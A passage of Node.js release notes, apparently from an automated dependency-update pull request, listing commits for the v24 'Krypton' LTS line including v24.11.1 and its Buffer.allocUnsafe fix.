\[[`6283bb5cc9`](https://redirect.github.com/nodejs/node/commit/6283bb5cc9)] - **doc**: fix pseudo code in modules.md (chirsz) [#​57677](https://redirect.github.com/nodejs/node/pull/57677) - \[[`d5059ea537`](https://redirect.github.com/nodejs/node/commit/d5059ea537)] - **doc**: add missing variable in code snippet (Koushil Mankali) [#​55478](https://redirect.github.com/nodejs/node/pull/55478) - \[[`900de373ae`](https://redirect.github.com/nodejs/node/commit/900de373ae)] - **doc**: add missing word in `single-executable-applications.md` (Konstantin Tsabolov) [#​53864](https://redirect.github.com/nodejs/node/pull/53864) - \[[`5735044c8b`](https://redirect.github.com/nodejs/node/commit/5735044c8b)] - **doc**: fix typo in http.md (Michael Solomon) [#​59354](https://redirect.github.com/nodejs/node/pull/59354) - \[[`2dee6df831`](https://redirect.github.com/nodejs/node/commit/2dee6df831)] - **doc**: update devcontainer.json and add documentation (Joyee Cheung) [#​60472](https://redirect.github.com/nodejs/node/pull/60472) - \[[`8f2d98d7d2`](https://redirect.github.com/nodejs/node/commit/8f2d98d7d2)] - **doc**: add haramj as triager (Haram Jeong) [#​60348](https://redirect.github.com/nodejs/node/pull/60348) - \[[`bbd7fdfff4`](https://redirect.github.com/nodejs/node/commit/bbd7fdfff4)] - **doc**: clarify require(esm) description (dynst) [#​60520](https://redirect.github.com/nodejs/node/pull/60520) - \[[`33ad11a764`](https://redirect.github.com/nodejs/node/commit/33ad11a764)] - **doc**: instantiate resolver object (Donghoon Nam) [#​60476](https://redirect.github.com/nodejs/node/pull/60476) - \[[`81a61274f3`](https://redirect.github.com/nodejs/node/commit/81a61274f3)] - **doc**: correct module loading descriptions (Joyee Cheung) [#​60346](https://redirect.github.com/nodejs/node/pull/60346) - \[[`77911185fe`](https://redirect.github.com/nodejs/node/commit/77911185fe)] - **doc**: clarify --use-system-ca support status (Joyee Cheung) [#​60340](https://redirect.github.com/nodejs/node/pull/60340) - \[[`185f6e95d9`](https://redirect.github.com/nodejs/node/commit/185f6e95d9)] - **doc,crypto**: link keygen to supported types (Filip Skokan) [#​60585](https://redirect.github.com/nodejs/node/pull/60585) - \[[`772d6c6608`](https://redirect.github.com/nodejs/node/commit/772d6c6608)] - **doc,src,lib**: clarify experimental status of Web Storage support (Antoine du Hamel) [#​60708](https://redirect.github.com/nodejs/node/pull/60708) - \[[`ad98e11ac2`](https://redirect.github.com/nodejs/node/commit/ad98e11ac2)] - **esm**: use sync loading/resolving on non-loader-hook thread (Joyee Cheung) [#​60380](https://redirect.github.com/nodejs/node/pull/60380) - \[[`1a00b5f68a`](https://redirect.github.com/nodejs/node/commit/1a00b5f68a)] - **(SEMVER-MINOR)** **http**: add optimizeEmptyRequests server option (Rafael Gonzaga) [#​59778](https://redirect.github.com/nodejs/node/pull/59778) - \[[`5703ce68bc`](https://redirect.github.com/nodejs/node/commit/5703ce68bc)] - **http**: replace startsWith with strict equality (btea) [#​59394](https://redirect.github.com/nodejs/node/pull/59394) - \[[`2b696ffad8`](https://redirect.github.com/nodejs/node/commit/2b696ffad8)] - **http2**: add diagnostics channels for client stream request body (Darshan Sen) [#​60480](https://redirect.github.com/nodejs/node/pull/60480) - \[[`dbdf4cb5a5`](https://redirect.github.com/nodejs/node/commit/dbdf4cb5a5)] - **inspector**: inspect HTTP response body (Chengzhong Wu) [#​60572](https://redirect.github.com/nodejs/node/pull/60572) - \[[`9dc9a7d33d`](https://redirect.github.com/nodejs/node/commit/9dc9a7d33d)] - **inspector**: support inspecting HTTP/2 request and response bodies (Darshan Sen) [#​60483](https://redirect.github.com/nodejs/node/pull/60483) - \[[`89fa2befe4`](https://redirect.github.com/nodejs/node/commit/89fa2befe4)] - **inspector**: fix crash when receiving non json message (Shima Ryuhei) [#​60388](https://redirect.github.com/nodejs/node/pull/60388) - \[[`ff5754077d`](https://redirect.github.com/nodejs/node/commit/ff5754077d)] - **(SEMVER-MINOR)** **lib**: add options to util.deprecate (Rafael Gonzaga) [#​59982](https://redirect.github.com/nodejs/node/pull/59982) - \[[`33baaf42c8`](https://redirect.github.com/nodejs/node/commit/33baaf42c8)] - **lib**: replace global SharedArrayBuffer constructor with bound method (Renegade334) [#​60497](https://redirect.github.com/nodejs/node/pull/60497) - \[[`b047586a08`](https://redirect.github.com/nodejs/node/commit/b047586a08)] - **meta**: bump actions/download-artifact from 5.0.0 to 6.0.0 (dependabot\[bot]) [#​60532](https://redirect.github.com/nodejs/node/pull/60532) - \[[`64192176d7`](https://redirect.github.com/nodejs/node/commit/64192176d7)] - **meta**: bump actions/upload-artifact from 4.6.2 to 5.0.0 (dependabot\[bot]) [#​60531](https://redirect.github.com/nodejs/node/pull/60531) - \[[`af6d4a6b9b`](https://redirect.github.com/nodejs/node/commit/af6d4a6b9b)] - **meta**: bump github/codeql-action from 3.30.5 to 4.31.2 (dependabot\[bot]) [#​60533](https://redirect.github.com/nodejs/node/pull/60533) - \[[`c17276fd24`](https://redirect.github.com/nodejs/node/commit/c17276fd24)] - **meta**: bump actions/setup-node from 5.0.0 to 6.0.0 (dependabot\[bot]) [#​60529](https://redirect.github.com/nodejs/node/pull/60529) - \[[`6e8b52a7dc`](https://redirect.github.com/nodejs/node/commit/6e8b52a7dc)] - **meta**: bump actions/stale from 10.0.0 to 10.1.0 (dependabot\[bot]) [#​60528](https://redirect.github.com/nodejs/node/pull/60528) - \[[`a12658595b`](https://redirect.github.com/nodejs/node/commit/a12658595b)] - **meta**: call `create-release-post.yml` post release (Aviv Keller) [#​60366](https://redirect.github.com/nodejs/node/pull/60366) - \[[`8987159234`](https://redirect.github.com/nodejs/node/commit/8987159234)] - **(SEMVER-MINOR)** **module**: mark type stripping as stable (Marco Ippolito) [#​60600](https://redirect.github.com/nodejs/node/pull/60600) - \[[`36da413663`](https://redirect.github.com/nodejs/node/commit/36da413663)] - **module**: fix directory option in the enableCompileCache() API (Joyee Cheung) [#​59931](https://redirect.github.com/nodejs/node/pull/59931) - \[[`92c484ebf4`](https://redirect.github.com/nodejs/node/commit/92c484ebf4)] - **(SEMVER-MINOR)** **node-api**: add napi\_create\_object\_with\_properties (Miguel Marcondes Filho) [#​59953](https://redirect.github.com/nodejs/node/pull/59953) - \[[`545162b0d4`](https://redirect.github.com/nodejs/node/commit/545162b0d4)] - **node-api**: use local files for instanceof test (Vladimir Morozov) [#​60190](https://redirect.github.com/nodejs/node/pull/60190) - \[[`526c011d89`](https://redirect.github.com/nodejs/node/commit/526c011d89)] - **perf\_hooks**: fix stack overflow error (Antoine du Hamel) [#​60084](https://redirect.github.com/nodejs/node/pull/60084) - \[[`1de0476939`](https://redirect.github.com/nodejs/node/commit/1de0476939)] - **perf\_hooks**: move non-standard performance properties to perf\_hooks (Chengzhong Wu) [#​60370](https://redirect.github.com/nodejs/node/pull/60370) - \[[`07ec1239ef`](https://redirect.github.com/nodejs/node/commit/07ec1239ef)] - **repl**: fix pasting after moving the cursor to the left (Ruben Bridgewater) [#​60470](https://redirect.github.com/nodejs/node/pull/60470) - \[[`b11bc5984e`](https://redirect.github.com/nodejs/node/commit/b11bc5984e)] - **(SEMVER-MINOR)** **sqlite**: allow setting defensive flag (Bart Louwers) [#​60217](https://redirect.github.com/nodejs/node/pull/60217) - \[[`273c9661fd`](https://redirect.github.com/nodejs/node/commit/273c9661fd)] - **sqlite,doc**: fix StatementSync section (Edy Silva) [#​60474](https://redirect.github.com/nodejs/node/pull/60474) - \[[`d92ec21a4c`](https://redirect.github.com/nodejs/node/commit/d92ec21a4c)] - **src**: use CP\_UTF8 for wide file names on win32 (Fedor Indutny) [#​60575](https://redirect.github.com/nodejs/node/pull/60575) - \[[`baef0468ed`](https://redirect.github.com/nodejs/node/commit/baef0468ed)] - **src**: move Node-API version detection to where it is used (Anna Henningsen) [#​60512](https://redirect.github.com/nodejs/node/pull/60512) - \[[`e7da5b4b7d`](https://redirect.github.com/nodejs/node/commit/e7da5b4b7d)] - **(SEMVER-MINOR)** **src**: add watch config namespace (Marco Ippolito) [#​60178](https://redirect.github.com/nodejs/node/pull/60178) - \[[`a7f7d10c06`](https://redirect.github.com/nodejs/node/commit/a7f7d10c06)] - **(SEMVER-MINOR)** **src**: add an option to make compile cache portable (Aditi) [#​58797](https://redirect.github.com/nodejs/node/pull/58797) - \[[`566add0b19`](https://redirect.github.com/nodejs/node/commit/566add0b19)] - **src**: avoid C strings in more C++ exception throws (Anna Henningsen) [#​60592](https://redirect.github.com/nodejs/node/pull/60592) - \[[`9b796347c1`](https://redirect.github.com/nodejs/node/commit/9b796347c1)] - **src**: add internal binding for constructing SharedArrayBuffers (Renegade334) [#​60497](https://redirect.github.com/nodejs/node/pull/60497) - \[[`3b01cbb411`](https://redirect.github.com/nodejs/node/commit/3b01cbb411)] - **src**: move `napi_addon_register_func` to `node_api_types.h` (Anna Henningsen) [#​60512](https://redirect.github.com/nodejs/node/pull/60512) - \[[`02fb7f4ecb`](https://redirect.github.com/nodejs/node/commit/02fb7f4ecb)] - **src**: remove unconditional NAPI\_EXPERIMENTAL in node.h (Chengzhong Wu) [#​60345](https://redirect.github.com/nodejs/node/pull/60345) - \[[`bd09ae24e4`](https://redirect.github.com/nodejs/node/commit/bd09ae24e4)] - **src**: clean up generic counter implementation (Anna Henningsen) [#​60447](https://redirect.github.com/nodejs/node/pull/60447) - \[[`cd6bf51dbd`](https://redirect.github.com/nodejs/node/commit/cd6bf51dbd)] - **src**: add enum handle for ToStringHelper + formatting (Burkov Egor) [#​56829](https://redirect.github.com/nodejs/node/pull/56829) - \[[`92ea669240`](https://redirect.github.com/nodejs/node/commit/92ea669240)] - **(SEMVER-MINOR)** **src,permission**: add --allow-inspector ability (Rafael Gonzaga) [#​59711](https://redirect.github.com/nodejs/node/pull/59711) - \[[`ac3dbe48f7`](https://redirect.github.com/nodejs/node/commit/ac3dbe48f7)] - **stream**: don't try to read more if reading (Robert Nagy) [#​60454](https://redirect.github.com/nodejs/node/pull/60454) - \[[`790288a93b`](https://redirect.github.com/nodejs/node/commit/790288a93b)] - **test**: ensure assertions are reachable in `test/internet` (Antoine du Hamel) [#​60513](https://redirect.github.com/nodejs/node/pull/60513) - \[[`0a85132989`](https://redirect.github.com/nodejs/node/commit/0a85132989)] - **test**: fix status when compiled without inspector (Antoine du Hamel) [#​60289](https://redirect.github.com/nodejs/node/pull/60289) - \[[`2f57673172`](https://redirect.github.com/nodejs/node/commit/2f57673172)] - **test**: deflake test-perf-hooks-timerify-histogram-sync (Joyee Cheung) [#​60639](https://redirect.github.com/nodejs/node/pull/60639) - \[[`09726269de`](https://redirect.github.com/nodejs/node/commit/09726269de)] - **test**: apply a delay to `watch-mode-kill-signal` tests (Joyee Cheung) [#​60610](https://redirect.github.com/nodejs/node/pull/60610) - \[[`45537b9562`](https://redirect.github.com/nodejs/node/commit/45537b9562)] - **test**: async iife in repl (Tony Gorez) [#​44878](https://redirect.github.com/nodejs/node/pull/44878) - \[[`4ca81f101d`](https://redirect.github.com/nodejs/node/commit/4ca81f101d)] - **test**: parallelize sea tests when there's enough disk space (Joyee Cheung) [#​60604](https://redirect.github.com/nodejs/node/pull/60604) - \[[`ea71e96191`](https://redirect.github.com/nodejs/node/commit/ea71e96191)] - **test**: only show overridden env in child process failures (Joyee Cheung) [#​60556](https://redirect.github.com/nodejs/node/pull/60556) - \[[`06b2e348c7`](https://redirect.github.com/nodejs/node/commit/06b2e348c7)] - **test**: ensure assertions are reached on more tests (Antoine du Hamel) [#​60498](https://redirect.github.com/nodejs/node/pull/60498) - \[[`de9c8cb670`](https://redirect.github.com/nodejs/node/commit/de9c8cb670)] - **test**: ensure assertions are reachable in `test/es-module` (Antoine du Hamel) [#​60501](https://redirect.github.com/nodejs/node/pull/60501) - \[[`75bc40fced`](https://redirect.github.com/nodejs/node/commit/75bc40fced)] - **test**: ensure assertions are reached on more tests (Antoine du Hamel) [#​60485](https://redirect.github.com/nodejs/node/pull/60485) - \[[`1a6084cfd3`](https://redirect.github.com/nodejs/node/commit/1a6084cfd3)] - **test**: ensure assertions are reached on more tests (Antoine du Hamel) [#​60500](https://redirect.github.com/nodejs/node/pull/60500) - \[[`2c651c90cf`](https://redirect.github.com/nodejs/node/commit/2c651c90cf)] - **test**: split test-perf-hooks-timerify (Joyee Cheung) [#​60568](https://redirect.github.com/nodejs/node/pull/60568) - \[[`6e8b5f7345`](https://redirect.github.com/nodejs/node/commit/6e8b5f7345)] - **test**: add more logs to test-esm-loader-hooks-inspect-wait (Joyee Cheung) [#​60466](https://redirect.github.com/nodejs/node/pull/60466) - \[[`9dea7ffa30`](https://redirect.github.com/nodejs/node/commit/9dea7ffa30)] - **test**: mark stringbytes-external-exceed-max tests as flaky on AIX (Joyee Cheung) [#​60565](https://redirect.github.com/nodejs/node/pull/60565) - \[[`0b3c3b710a`](https://redirect.github.com/nodejs/node/commit/0b3c3b710a)] - **test**: split test-esm-wasm.js (Joyee Cheung) [#​60491](https://redirect.github.com/nodejs/node/pull/60491) - \[[`a15b795b34`](https://redirect.github.com/nodejs/node/commit/a15b795b34)] - **test**: correct conditional secure heap flags test (Shelley Vohr) [#​60385](https://redirect.github.com/nodejs/node/pull/60385) - \[[`38b77b3a44`](https://redirect.github.com/nodejs/node/commit/38b77b3a44)] - **test**: fix flaky test-watch-mode-kill-signal-\* (Joyee Cheung) [#​60443](https://redirect.github.com/nodejs/node/pull/60443) - \[[`e8d7598057`](https://redirect.github.com/nodejs/node/commit/e8d7598057)] - **test**: capture stack trace in debugger timeout errors (Joyee Cheung) [#​60457](https://redirect.github.com/nodejs/node/pull/60457) - \[[`674befeb81`](https://redirect.github.com/nodejs/node/commit/674befeb81)] - **test**: ensure assertions are reachable in `test/sequential` (Antoine du Hamel) [#​60412](https://redirect.github.com/nodejs/node/pull/60412) - \[[`952c08a735`](https://redirect.github.com/nodejs/node/commit/952c08a735)] - **test**: ensure assertions are reachable in more folders (Antoine du Hamel) [#​60411](https://redirect.github.com/nodejs/node/pull/60411) - \[[`bbca57584b`](https://redirect.github.com/nodejs/node/commit/bbca57584b)] - **test**: split test-runner-watch-mode (Joyee Cheung) [#​60391](https://redirect.github.com/nodejs/node/pull/60391) - \[[`e78e0cf6e7`](https://redirect.github.com/nodejs/node/commit/e78e0cf6e7)] - **test**: move test-runner-watch-mode helper into common (Joyee Cheung) [#​60391](https://redirect.github.com/nodejs/node/pull/60391) - \[[`84576ef021`](https://redirect.github.com/nodejs/node/commit/84576ef021)] - **test**: ensure assertions are reachable in `test/addons` (Antoine du Hamel) [#​60142](https://redirect.github.com/nodejs/node/pull/60142) - \[[`1659078c11`](https://redirect.github.com/nodejs/node/commit/1659078c11)] - **test**: ignore EPIPE errors in https proxy invalid URL test (Joyee Cheung) [#​60269](https://redirect.github.com/nodejs/node/pull/60269) - \[[`79ffee80ec`](https://redirect.github.com/nodejs/node/commit/79ffee80ec)] - **test**: ensure assertions are reachable in `test/client-proxy` (Antoine du Hamel) [#​60175](https://redirect.github.com/nodejs/node/pull/60175) - \[[`e5a812243a`](https://redirect.github.com/nodejs/node/commit/e5a812243a)] - **test**: ensure assertions are reachable in `test/async-hooks` (Antoine du Hamel) [#​60150](https://redirect.github.com/nodejs/node/pull/60150) - \[[`e924fd72e3`](https://redirect.github.com/nodejs/node/commit/e924fd72e3)] - **test,crypto**: handle a few more BoringSSL tests (Shelley Vohr) [#​59030](https://redirect.github.com/nodejs/node/pull/59030) - \[[`a55ac11611`](https://redirect.github.com/nodejs/node/commit/a55ac11611)] - **test,crypto**: update x448 and ed448 expectation when on boringssl (Shelley Vohr) [#​60387](https://redirect.github.com/nodejs/node/pull/60387) - \[[`55d5e9ec73`](https://redirect.github.com/nodejs/node/commit/55d5e9ec73)] - **tls**: fix leak on invalid protocol method (Shelley Vohr) [#​60427](https://redirect.github.com/nodejs/node/pull/60427) - \[[`5763c96e7c`](https://redirect.github.com/nodejs/node/commit/5763c96e7c)] - **tools**: replace invalid expression in dependabot config (Riddhi) [#​60649](https://redirect.github.com/nodejs/node/pull/60649) - \[[`b6e21b47d7`](https://redirect.github.com/nodejs/node/commit/b6e21b47d7)] - **tools**: skip unaffected GHA jobs for changes in `test/internet` (Antoine du Hamel) [#​60517](https://redirect.github.com/nodejs/node/pull/60517) - \[[`999664c76d`](https://redirect.github.com/nodejs/node/commit/999664c76d)] - **tools**: do not use short hashes for deps versioning to avoid collision (Antoine du Hamel) [#​60407](https://redirect.github.com/nodejs/node/pull/60407) - \[[`ada856d0fb`](https://redirect.github.com/nodejs/node/commit/ada856d0fb)] - **tools**: only add test reporter args when node:test is used (Joyee Cheung) [#​60551](https://redirect.github.com/nodejs/node/pull/60551) - \[[`1812c56bb3`](https://redirect.github.com/nodejs/node/commit/1812c56bb3)] - **tools**: fix update-icu script (Michaël Zasso) [#​60521](https://redirect.github.com/nodejs/node/pull/60521) - \[[`747040438a`](https://redirect.github.com/nodejs/node/commit/747040438a)] - **tools**: fix linter for semver-major release proposals (Antoine du Hamel) [#​60481](https://redirect.github.com/nodejs/node/pull/60481) - \[[`f170551e40`](https://redirect.github.com/nodejs/node/commit/f170551e40)] - **tools**: fix failing release-proposal linter for LTS transitions (Antoine du Hamel) [#​60465](https://redirect.github.com/nodejs/node/pull/60465) - \[[`2db4ea0ce4`](https://redirect.github.com/nodejs/node/commit/2db4ea0ce4)] - **tools**: remove undici from daily wpt.fyi job (Filip Skokan) [#​60444](https://redirect.github.com/nodejs/node/pull/60444) - \[[`2a85aa4e7b`](https://redirect.github.com/nodejs/node/commit/2a85aa4e7b)] - **tools**: add lint rule to ensure assertions are reached (Antoine du Hamel) [#​60125](https://redirect.github.com/nodejs/node/pull/60125) - \[[`48299ef5fb`](https://redirect.github.com/nodejs/node/commit/48299ef5fb)] - **tools,doc**: update JavaScript primitive types to match MDN Web Docs (JustApple) [#​60581](https://redirect.github.com/nodejs/node/pull/60581) - \[[`7ec04cf936`](https://redirect.github.com/nodejs/node/commit/7ec04cf936)] - **util**: fix stylize of special properties in inspect (Ge Gao) [#​60479](https://redirect.github.com/nodejs/node/pull/60479) - \[[`05d7509bd2`](https://redirect.github.com/nodejs/node/commit/05d7509bd2)] - **(SEMVER-MINOR)** **v8**: add cpu profile (theanarkh) [#​59807](https://redirect.github.com/nodejs/node/pull/59807) - \[[`884fe884a1`](https://redirect.github.com/nodejs/node/commit/884fe884a1)] - **vm**: hint module identifier in instantiate errors (Chengzhong Wu) [#​60199](https://redirect.github.com/nodejs/node/pull/60199) - \[[`a2caf19f70`](https://redirect.github.com/nodejs/node/commit/a2caf19f70)] - **watch**: fix interaction with multiple env files (Marco Ippolito) [#​60605](https://redirect.github.com/nodejs/node/pull/60605) ### [`v24.11.1`](https://redirect.github.com/nodejs/node/releases/tag/v24.11.1): 2025-11-11, Version 24.11.1 'Krypton' (LTS), @​aduh95 [Compare Source](https://redirect.github.com/nodejs/node/compare/v24.11.0...v24.11.1) ##### Notable Changes The known issue relating to `Buffer.allocUnsafe` incorrectly zero-filling buffers has now been addressed and now returns uninitialized memory as documented in the [`Buffer.allocUnsafe`](https://nodejs.org/docs/latest-v24.x/api/buffer.html#static-method-bufferallocunsafesize) documentation. ##### Commits - \[[`0a15ccf3f4`](https://redirect.github.com/nodejs/node/commit/0a15ccf3f4)] - **benchmark**: improve cpu.sh for safety and usability (Nam Yooseong) [#​60162](https://redirect.github.com/nodejs/node/pull/60162) - \[[`a1c7d1dac9`](https://redirect.github.com/nodejs/node/commit/a1c7d1dac9)] - **benchmark**: add benchmark for leaf source text modules (Joyee Cheung) [#​60205](https://redirect.github.com/nodejs/node/pull/60205) - \[[`99e2acf46b`](https://redirect.github.com/nodejs/node/commit/99e2acf46b)] - **benchmark**: add vm.SourceTextModule benchmark (Joyee Cheung) [#​59396](https://redirect.github.com/nodejs/node/pull/59396) - \[[`c01c72b407`](https://redirect.github.com/nodejs/node/commit/c01c72b407)] - **benchmark**: use non-deprecated WriteUtf8V2 method (Michaël Zasso) [#​60173](https://redirect.github.com/nodejs/node/pull/60173) - \[[`a42dbd138e`](https://redirect.github.com/nodejs/node/commit/a42dbd138e)] - **build**: ibmi follow aix visibility (SRAVANI GUNDEPALLI) [#​60360](https://redirect.github.com/nodejs/node/pull/60360) - \[[`5673a54a5d`](https://redirect.github.com/nodejs/node/commit/5673a54a5d)] - **build**: use call command when calling python configure (Jacob Nichols) [#​60098](https://redirect.github.com/nodejs/node/pull/60098) - \[[`c67cb727cb`](https://redirect.github.com/nodejs/node/commit/c67cb727cb)] - **build**: build v8 with -fvisibility=hidden -fvisibility-inlines-hidden (Joyee Cheung) [#​56290](https://redirect.github.com/nodejs/node/pull/56290) - \[[`b03f7b93b1`](https://redirect.github.com/nodejs/node/commit/b03f7b93b1)] - **build**: remove V8\_COMPRESS\_POINTERS\_IN\_ISOLATE\_CAGE defs (Joyee Cheung) [#​60296](https://redirect.github.com/nodejs/node/pull/60296) - \[[`2505568531`](https://redirect.github.com/nodejs/node/commit/2505568531)] - **build, src**: fix include paths for vtune files (Rahul) [#​59999](https://redirect.github.com/nodejs/node/pull/59999) - \[[`95330b036f`](https://redirect.github.com/nodejs/node/commit/95330b036f)] - **crypto**: update root certificates to NSS 3.116 (Node.js GitHub Bot) [#​59956](https://redirect.github.com/nodejs/node/pull/59956) - \[[`c221d892ef`](https://redirect.github.com/nodejs/node/commit/c221d892ef)] - **deps**: update corepack to 0.34.2 (Node.js GitHub Bot) [#​60550](https://redirect.github.com/nodejs/node/pull/60550) - \[[`bc00aa4c77`](https://redirect.github.com/nodejs/node/commit/bc00aa4c77)] - **deps**: update simdjson to 4.0.7 (Node.js GitHub Bot) [#​59883](https://redirect.github.com/nodejs/node/pull/59883) - \[[`d03b89ec53`](https://redirect.github.com/nodejs/node/commit/d03b89ec53)] - **deps**: update corepack to 0.34.1 (Node.js GitHub Bot) [#​60314](https://redirect.github.com/nodejs/node/pull/60314) - \[[`b7882090de`](https://redirect.github.com/nodejs/node/commit/b7882090de)] - **deps**: update inspector\_protocol to [`af7f5a8`](https://redirect.github.com/nodejs/node/commit/af7f5a8173fdbc29f0835ec94395932e328b) (Node.js GitHub Bot) [#​60312](https://redirect.github.com/nodejs/node/pull/60312) - \[[`7007f9dd65`](https://redirect.github.com/nodejs/node/commit/7007f9dd65)] - **deps**: update googletest to [`279f847`](https://redirect.github.com/nodejs/node/commit/279f847) (Node.js GitHub Bot) [#​60219](https://redirect.github.com/nodejs/node/pull/60219) - \[[`a56aa9ffa8`](https://redirect.github.com/nodejs/node/commit/a56aa9ffa8)] - **deps**: upgrade npm to 11.6.2 (npm team) [#​60168](https://redirect.github.com/nodejs/node/pull/60168) - \[[`0bf8952721`](https://redirect.github.com/nodejs/node/commit/0bf8952721)] - **doc**: mention more codemods in `deprecations.md` (Augustin Mauroy) [#​60243](https://redirect.github.com/nodejs/node/pull/60243) - \[[`2473ca77f6`](https://redirect.github.com/nodejs/node/commit/2473ca77f6)] - **doc**: add missing CAA type to dns.resolveAny() & dnsPromises.resolveAny() (Jimmy Leung) [#​58899](https://redirect.github.com/nodejs/node/pull/58899) - \[[`39ddd8522e`](https://redirect.github.com/nodejs/node/commit/39ddd8522e)] - **doc**: use `any` for `worker_threads.Worker` 'error' event argument `err` (Jonas Geiler) [#​60300](https://redirect.github.com/nodejs/node/pull/60300) - \[[`eaa825fd97`](https://redirect.github.com/nodejs/node/commit/eaa825fd97)] - **doc**: update decorator documentation to reflect actual policy (Muhammad Salman Aziz) [#​60288](https://redirect.github.com/nodejs/node/pull/60288) - \[[`a744e42282`](https://redirect.github.com/nodejs/node/commit/a744e42282)] - **doc**: document wildcard supported by tools/test.py (Joyee Cheung) [#​60265](https://redirect.github.com/nodejs/node/pull/60265) - \[[`ec0d5beb09`](https://redirect.github.com/nodejs/node/commit/ec0d5beb09)] - **doc**: add --heap-snapshot-on-oom to useful v8 flag (jakecastelli) [#​60260](https://redirect.github.com/nodejs/node/pull/60260) - \[[`13da0df12a`](https://redirect.github.com/nodejs/node/commit/13da0df12a)] - **doc**: fix `blob.bytes()` heading level (XTY) [#​60252](https://redirect.github.com/nodejs/node/pull/60252) - \[[`8e771632b7`](https://redirect.github.com/nodejs/node/commit/8e771632b7)] - **doc**: fix not working code example in vm docs (Artur Gawlik) [#​60224](https://redirect.github.com/nodejs/node/pull/60224) - \[[`70c2080bff`](https://redirect.github.com/nodejs/node/commit/70c2080bff)] - **doc**: improve code snippet alternative of url.parse() using WHATWG URL (Steven) [#​60209](https://redirect.github.com/nodejs/node/pull/60209) - \[[`beadcf176e`](https://redirect.github.com/nodejs/node/commit/beadcf176e)] - **doc**: `createSQLTagStore` -> `createTagStore` (Aviv Keller) [#​60182](https://redirect.github.com/nodejs/node/pull/60182) - \[[`b0da3b9c6a`](https://redirect.github.com/nodejs/node/commit/b0da3b9c6a)] - **doc**: use markdown when branch-diff major release (Rafael Gonzaga) [#​60179](https://redirect.github.com/nodejs/node/pull/60179) - \[[`688115aa6b`](https://redirect.github.com/nodejs/node/commit/688115aa6b)] - **doc**: update teams in collaborator-guide.md and add links (Bart Louwers) [#​60065](https://redirect.github.com/nodejs/node/pull/60065) - \[[`923082a064`](https://redirect.github.com/nodejs/node/commit/923082a064)] - **doc**: disambiguate top-level `worker_threads` module exports (René) [#​59890](https://redirect.github.com/nodejs/node/pull/59890) - \[[`7be4330870`](https://redirect.github.com/nodejs/node/commit/7be4330870)] - **doc**: add known issue to v24.11.0 release notes (Richard Lau) [#​60467](https://redirect.github.com/nodejs/node/pull/60467) - \[[`4d8f62aeaf`](https://redirect.github.com/nodejs/node/commit/4d8f62aeaf)] - **doc, module**: change async customization hooks to experimental (Gerhard Stöbich) [#​60302](https://redirect.github.com/nodejs/node/pull/60302) - \[[`d86a118bbd`](https://redirect.github.com/nodejs/node/commit/d86a118bbd)] - **http**: lazy allocate cookies array (Robert Nagy) [#​59734](https://redirect.github.com/nodejs/node/pull/59734) - \[[`8c256d4139`](https://redirect.github.com/nodejs/node/commit/8c256d4139)] - **http**: fix http client leaky with double response (theanarkh) [#​60062](https://redirect.github.com/nodejs/node/pull/60062) - \[[`265e9d59fa`](https://redirect.github.com/nodejs/node/commit/265e9d59fa)] - **http2**: rename variable to additionalPseudoHeaders (Tobias Nießen) [#​60208](https://redirect.github.com/nodejs/node/pull/60208) - \[[`65bec037e2`](https://redirect.github.com/nodejs/node/commit/65bec037e2)] - **http2**: do not crash on mismatched ping buffer length (René) [#​60135](https://redirect.github.com/nodejs/node/pull/60135) - \[[`9b83ef53b7`](https://redirect.github.com/nodejs/node/commit/9b83ef53b7)] - **inspector**: add network payload buffer size limits (Chengzhong Wu) [#​60236](https://redirect.github.com/nodejs/node/pull/60236) - \[[`03ac05c458`](https://redirect.github.com/nodejs/node/commit/03ac05c458)] - **inspector**: support handshake response for websocket inspection (Shima Ryuhei) [#​60225](https://redirect.github.com/nodejs/node/pull/60225) - \[[`aa04f06190`](https://redirect.github.com/nodejs/node/commit/aa04f06190)] - **lib**: fix typo in createBlobReaderStream (SeokHun) [#​60132](https://redirect.github.com/nodejs/node/pull/60132) - \[[`5aea1a429e`](https://redirect.github.com/nodejs/node/commit/5aea1a429e)] - **lib**: fix constructor in \_errnoException stack tree (SeokHun) [#​60156](https://redirect.github.com/nodejs/node/pull/60156) - \[[`4f7745acc7`](https://redirect.github.com/nodejs/node/commit/4f7745acc7)] - **lib**: fix typo in QuicSessionStats (SeokHun) [#​60155](https://redirect.github.com/nodejs/node/pull/60155) - \[[`f8725861ea`](https://redirect.github.com/nodejs/node/commit/f8725861ea)] - **lib**: remove redundant destroyHook checks (Gürgün Dayıoğlu) [#​60120](https://redirect.github.com/nodejs/node/pull/60120) - \[[`696c20bf3f`](https://redirect.github.com/nodejs/node/commit/696c20bf3f)] - **meta**: move one or more collaborators to emeritus (Node.js GitHub Bot) [#​60325](https://redirect.github.com/nodejs/node/pull/60325) - \[[`90434ff99a`](https://redirect.github.com/nodejs/node/commit/90434ff99a)] - **meta**: loop userland-migrations in deprecations (Chengzhong Wu) [#​60299](https://redirect.github.com/nodejs/node/pull/60299) - \[[`ffbc0ae60a`](https://redirect.github.com/nodejs/node/commit/ffbc0ae60a)] - **module**: refactor and clarify async loader hook customizations (Joyee Cheung) [#​60278](https://redirect.github.com/nodejs/node/pull/60278) - \[[`6ed6062f7d`](https://redirect.github.com/nodejs/node/commit/6ed6062f7d)] - **module**: handle null source from async loader hooks in sync hooks (Joyee Cheung) [#​59929](https://redirect.github.com/nodejs/node/pull/59929) - \[[`a2871baed2`](https://redirect.github.com/nodejs/node/commit/a2871baed2)] - **msi**: fix WiX warnings (Stefan Stojanovic) [#​60251](https://redirect.github.com/nodejs/node/pull/60251) - \[[`6199541d67`](https://redirect.github.com/nodejs/node/commit/6199541d67)] - **src**: fix timing of snapshot serialize callback (Joyee Cheung) [#​60434](https://redirect.github.com/nodejs/node/pull/60434) - \[[`13b687959a`](https://redirect.github.com/nodejs/node/commit/13b687959a)] - **src**: add COUNT\_GENERIC\_USAGE utility for tests (Joyee Cheung) [#​60434](https://redirect.github.com/nodejs/node/pull/60434) - \[[`a587623b4f`](https://redirect.github.com/nodejs/node/commit/a587623b4f)] - **src**: conditionally disable source phase imports by default (Shelley Vohr) [#​60364](https://redirect.github.com/nodejs/node/pull/60364) - \[[`e483267995`](https://redirect.github.com/nodejs/node/commit/e483267995)] - **src**: use cached primordials\_string (Sohyeon Kim) [#​60255](https://redirect.github.com/nodejs/node/pull/60255) - \[[`4c9a64fbaf`](https://redirect.github.com/nodejs/node/commit/4c9a64fbaf)] - **src**: replace Environment::GetCurrent with args.GetIsolate (Sohyeon Kim) [#​60256](https://redirect.github.com/nodejs/node/pull/60256) - 